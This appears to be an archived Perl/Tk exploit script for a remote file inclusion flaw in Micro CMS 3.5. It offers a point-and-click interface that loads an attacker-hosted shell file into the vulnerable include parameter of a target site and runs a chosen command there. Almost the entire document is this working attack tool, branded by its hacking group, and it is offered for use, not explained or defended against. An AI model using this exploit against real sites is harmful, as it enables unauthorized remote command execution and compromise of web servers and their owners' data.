Micro CMS version 3.5 remote file inclusion exploit.
c4d2cd88a01c55d00bf550fccb4dcdbd0fe0c8bcb53bd3ddd3560e625a901c07#!/usr/bin/perl
Script: Micro CMS 3.5
site: http://www.impliedbydesign.com/apps/microcms/microcms.zip
Coded By : ilker Kandemir <ilkerkandemir[at]mynet.com>
use Tk;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "AYYILDIZ.ORG :: Micro CMS <= 3.5 Remote File Include Exploit " );
$mw->geometry ( '500x300' ) ;
$mw->resizable(0,0);
$mw->Label(-text => 'Micro CMS <= 3.5 (show_hlp.php) Remote File Include Exploit', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack();
$mw->Label(-text => '')->pack();
$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://www.site.com/[Micro-CMS_PATH]/micro_cms_files/microcms-include.php?microcms_path=';
$shell_path = 'http://site_server/shell.txt?';
$cmd = 'ls -la';
$fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();
$fright->Button(-text => 'Exploit Include Vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&akcja
)->pack();
$fright->Label( -text => ' ')->pack();
$fright->Label( -text => 'Exploit coded by ilker Kandemir', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'AYYILDIZ TEAM', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'http://www.ayyildiz.org/', -font => '{Verdana} 7')->pack();
MainLoop();
sub akcja()
{
$InfoWindow=$mw->DialogBox(-title => 'AYYILDIZ TEAM Exploit by ilker kandemir ', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'http://www.ayyildiz.org/', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'Greetz For my friends ', -font => '{Verdana} 6')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
system("start $url$shell_path$cmd");
$InfoWindow->Show();
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed